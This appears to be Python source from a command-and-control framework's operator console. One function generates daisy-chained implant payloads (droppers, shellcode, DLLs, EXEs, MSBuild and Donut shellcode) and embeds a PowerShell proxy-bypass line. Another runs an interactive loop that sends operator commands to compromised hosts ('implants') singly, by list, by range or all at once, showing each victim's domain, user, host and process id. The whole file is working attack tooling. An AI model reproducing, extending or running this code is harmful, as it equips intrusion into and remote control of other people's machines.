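def do_createdaisypayload(user, command):
    """Interactively build a new set of daisy-chained payloads.

    Prompts the operator for a payload name, the daisy URL and the id of the
    implant that will act as the daisy host, then asks the ``Payloads`` class
    to emit every payload variant it supports, each prefixed with ``<name>_``.

    Args:
        user: operator name; accepted for interface parity with the other
            ``do_*`` handlers and not used here.
        command: raw console command that invoked this handler; not used.

    Returns:
        None. Progress is printed to the console; files are written by the
        ``Payloads`` instance into ``PayloadsDirectory``.
    """
    name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ")
    default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
    daisyurl = input(f"Daisy URL: e.g. {default_url} ")
    # A loopback address is rewritten to its hostname form before use; the
    # substitution pairs are those of the original implementation.
    for loopback, local in (("http://127.0.0.1", "http://localhost"),
                            ("https://127.0.0.1", "https://localhost")):
        if loopback in daisyurl:
            daisyurl = daisyurl.replace(loopback, local)
    daisyhostid = input("Select Daisy Implant Host: e.g. 5 ")
    daisyhost = get_implantbyid(daisyhostid)
    if not daisyhost:
        # Same handling as implant_command_loop: an unknown id is reported
        # here instead of surfacing as an AttributeError on daisyhost.User.
        print_bad("Unrecognised implant id: %s" % daisyhostid)
        input("Press Enter to continue...")
        clear()
        return
    proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
    pbindsecret = PBindSecret
    pbindpipename = PBindPipeName

    # string_to_array also returns an element count, which is not needed here.
    # (The original build of a per-URL host-header string was dead code and
    # has been removed; nothing consumed it.)
    daisyurl, _ = string_to_array(daisyurl)

    C2 = get_c2server_all()
    urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "",
                           "", "", "")
    newPayload = Payloads(C2.KillDate,
                          C2.EncKey,
                          C2.Insecure,
                          C2.UserAgent,
                          C2.Referrer,
                          "%s?d" % get_newimplanturl(),
                          PayloadsDirectory,
                          PowerShellProxyCommand=proxynone,
                          URLID=urlId,
                          PBindPipeName=pbindpipename,
                          PBindSecret=pbindsecret)
    # Point the dropper at the chosen host implant (user@domain) instead of
    # the daisy URL; a no-op if the search string is absent from PSDropper.
    newPayload.PSDropper = (newPayload.PSDropper).replace(
        "$pid;%s" % (daisyurl),
        "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
    # Every variant shares the "<name>_" file prefix.
    prefix = "%s_" % name
    newPayload.CreateDroppers(prefix)
    newPayload.CreateShellcode(prefix)
    newPayload.CreateRaw(prefix)
    newPayload.CreateDlls(prefix)
    newPayload.CreateEXE(prefix)
    newPayload.CreateMsbuild(prefix)
    newPayload.CreateDonutShellcode(prefix)
    newPayload.BuildDynamicPayloads(prefix)
    print_good("Created new %s daisy payloads" % name)
    input("Press Enter to continue...")
    clear()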
def get_implant_type_prompt_prefix(implant_id):
    """Return a short tag describing an implant's type for the console prompt.

    The implant's ``Pivot`` string is abbreviated to ``"PS"``, ``"C#"`` or
    ``"PY"`` when it starts with ``PS``, ``C#`` or ``Python`` respectively
    (otherwise the full ``Pivot`` value is used), then ``";D"``, ``";P"`` and
    ``";PB"`` are appended, in that order, when ``Daisy``, ``Proxy`` and
    ``PBind`` occur in it.

    Args:
        implant_id: single implant id; a comma-separated selector yields
            ``""`` without any lookup.

    Returns:
        The prompt tag, or ``""`` for a multi-implant selector.
    """
    if "," in str(implant_id):
        return ""
    pivot_original = get_implantbyid(implant_id).Pivot

    # First matching prefix wins; no match keeps the full Pivot string.
    tag = pivot_original
    for marker, short_name in (("PS", "PS"), ("C#", "C#"), ("Python", "PY")):
        if pivot_original.startswith(marker):
            tag = short_name
            break

    # Feature suffixes are independent of each other and of the prefix.
    suffixes = [suffix
                for marker, suffix in (("Daisy", ";D"),
                                       ("Proxy", ";P"),
                                       ("PBind", ";PB"))
                if marker in pivot_original]
    return tag + "".join(suffixes)
def implant_command_loop(implant_id, user):
    """Interactive prompt loop that dispatches operator commands to implants.

    ``implant_id`` is a selector, matched in this order: ``"all"`` (every
    implant returned by ``get_implants()``), a comma-separated list of ids,
    an inclusive numeric range ``"a-b"``, or a single id (anything else is
    passed straight to ``get_randomuri``). Commands are read with a
    ``PromptSession``; a multi-line command may, after confirmation, be run
    one line at a time. Each command is handed to ``run_implant_command``.

    Args:
        implant_id: implant selector as typed by the operator (see above).
        user: operator name, forwarded to ``run_implant_command`` and used
            in the log-off message.

    Returns:
        None. The loop ends when the operator enters ``back``/``clear``,
        when a single id is not recognised, or after an unexpected
        exception; ``EOFError`` (end of input) exits the process with
        ``sys.exit(0)``.
    """
    while (True):
        try:
            # Default prompt colour (green); PBind implants switch to blue below.
            style = Style.from_dict({
                '': '#80d130',
            })
            # Command history is persisted to a file under PoshProjectDirectory
            # and is shared by all implant sessions.
            session = PromptSession(history=FileHistory('%s/.implant-history' %
                                                        PoshProjectDirectory),
                                    auto_suggest=AutoSuggestFromHistory(),
                                    style=style)
            implant_id_orig = implant_id
            # Multi-implant selectors (range, "all", list) get a plain prompt:
            # there is no single implant whose type/host could be shown.
            if ("-" in implant_id) or ("all" in implant_id) or (","
                                                                in implant_id):
                print(Colours.GREEN)
                prompt_commands = POSH_COMMANDS
                command = session.prompt("%s> " % implant_id,
                                         completer=FirstWordFuzzyWordCompleter(
                                             prompt_commands, WORD=True))
                if command == "back" or command == 'clear':
                    do_back(user, command)
                    return
            else:
                implant = get_implantbyid(implant_id)
                if not implant:
                    print_bad("Unrecognised implant id or command: %s" %
                              implant_id)
                    input("Press Enter to continue...")
                    clear()
                    return
                # Completion word list follows the implant type; PBind wins
                # over the other checks because it is tested last.
                prompt_commands = POSH_COMMANDS
                if implant.Pivot.startswith('Python'):
                    prompt_commands = PY_COMMANDS
                if implant.Pivot.startswith('C#'):
                    prompt_commands = SHARP_COMMANDS
                if 'PB' in implant.Pivot:
                    # PBind implants: blue prompt, a fresh session object and
                    # the C# command set.
                    style = Style.from_dict({
                        '': '#008ECC',
                    })
                    session = PromptSession(
                        history=FileHistory('%s/.implant-history' %
                                            PoshProjectDirectory),
                        auto_suggest=AutoSuggestFromHistory(),
                        style=style)
                    prompt_commands = SHARP_COMMANDS
                    print(Colours.BLUE)
                else:
                    print(Colours.GREEN)
                print("%s\\%s @ %s (PID:%s)" % (implant.Domain, implant.User,
                                                implant.Hostname, implant.PID))
                command = session.prompt(
                    "%s %s> " %
                    (get_implant_type_prompt_prefix(implant_id), implant_id),
                    completer=FirstWordFuzzyWordCompleter(prompt_commands,
                                                          WORD=True))
                if command == "back" or command == 'clear':
                    do_back(user, command)
                    return

            # if "all" run through all implants get_implants()
            if implant_id == "all":
                # Redundant: "all" took the first prompt branch above, which
                # already returned on back/clear.
                if command == "back" or command == 'clear':
                    do_back(user, command)
                    return
                allcommands = command
                # `ri` is only bound when the command spans several lines and
                # is only read below under that same condition.
                if "\n" in command:
                    ri = input(
                        "Do you want to run commands separately? (Y/n) ")
                implants_split = get_implants()
                if implants_split:
                    for implant_details in implants_split:
                        # if "\n" in command run each command individually or ask the question if that's what they want to do
                        if "\n" in allcommands:
                            if ri.lower() == "y" or ri == "":
                                commands = allcommands.split('\n')
                                # NOTE: rebinds `command` to the last line.
                                for command in commands:
                                    run_implant_command(
                                        command, implant_details.RandomURI,
                                        implant_id_orig, user)
                            else:
                                run_implant_command(command,
                                                    implant_details.RandomURI,
                                                    implant_id_orig, user)
                        else:
                            run_implant_command(command,
                                                implant_details.RandomURI,
                                                implant_id_orig, user)

            # if "separated list" against single uri
            elif "," in implant_id:
                allcommands = command
                if "\n" in command:
                    ri = input(
                        "Do you want to run commands separately? (Y/n) ")
                implant_split = implant_id.split(",")
                # Unlike the range branch, a failing get_randomuri here is not
                # caught per id: it propagates to the outer handler and ends
                # the loop.
                for split_implant_id in implant_split:
                    implant_randomuri = get_randomuri(split_implant_id)
                    # if "\n" in command run each command individually or ask the question if that's what they want to do
                    if "\n" in allcommands:
                        if ri.lower() == "y" or ri == "":
                            commands = allcommands.split('\n')
                            for command in commands:
                                run_implant_command(command, implant_randomuri,
                                                    implant_id_orig, user)
                        else:
                            run_implant_command(command, implant_randomuri,
                                                implant_id_orig, user)
                    else:
                        run_implant_command(command, implant_randomuri,
                                            implant_id_orig, user)

            # if "range" against single uri
            elif "-" in implant_id:
                allcommands = command
                if "\n" in command:
                    ri = input(
                        "Do you want to run commands separately? (Y/n) ")
                implant_split = implant_id.split("-")
                # Non-numeric bounds raise ValueError from int(), which the
                # outer `except Exception` turns into a message and a return.
                for range_implant_id in range(int(implant_split[0]),
                                              int(implant_split[1]) + 1):
                    try:
                        # The id is passed as an int here, not as a string.
                        implant_randomuri = get_randomuri(range_implant_id)
                        # if "\n" in command run each command individually or ask the question if that's what they want to do
                        if "\n" in allcommands:
                            if ri.lower() == "y" or ri == "":
                                commands = allcommands.split('\n')
                                for command in commands:
                                    run_implant_command(
                                        command, implant_randomuri,
                                        implant_id_orig, user)
                            else:
                                run_implant_command(command, implant_randomuri,
                                                    implant_id_orig, user)
                        else:
                            run_implant_command(command, implant_randomuri,
                                                implant_id_orig, user)
                    except Exception:
                        # Any failure for this id (not only an unknown id) is
                        # reported this way and the range continues.
                        print_bad("Unknown ImplantID")

            # else run against single uri
            else:
                allcommands = command
                if "\n" in command:
                    ri = input(
                        "Do you want to run commands separately? (Y/n) ")
                implant_randomuri = get_randomuri(implant_id)
                # if "\n" in command run each command individually or ask the question if that's what they want to do
                if "\n" in allcommands:
                    if ri.lower() == "y" or ri == "":
                        commands = allcommands.split('\n')
                        for command in commands:
                            run_implant_command(command, implant_randomuri,
                                                implant_id_orig, user)
                    else:
                        run_implant_command(command, implant_randomuri,
                                            implant_id_orig, user)
                else:
                    run_implant_command(command, implant_randomuri,
                                        implant_id_orig, user)

        except KeyboardInterrupt:
            # Ctrl-C abandons the current prompt and re-prompts.
            continue
        except EOFError:
            # End of input (Ctrl-D): announce the log-off and exit the process.
            new_c2_message("%s logged off." % user)
            sys.exit(0)
        except Exception as e:
            # Any other error ends this loop after printing the traceback;
            # the caller decides what to do next.
            traceback.print_exc()
            print_bad(
                f"Error running against the selected implant ID, ensure you have typed the correct information: {e}"
            )
            return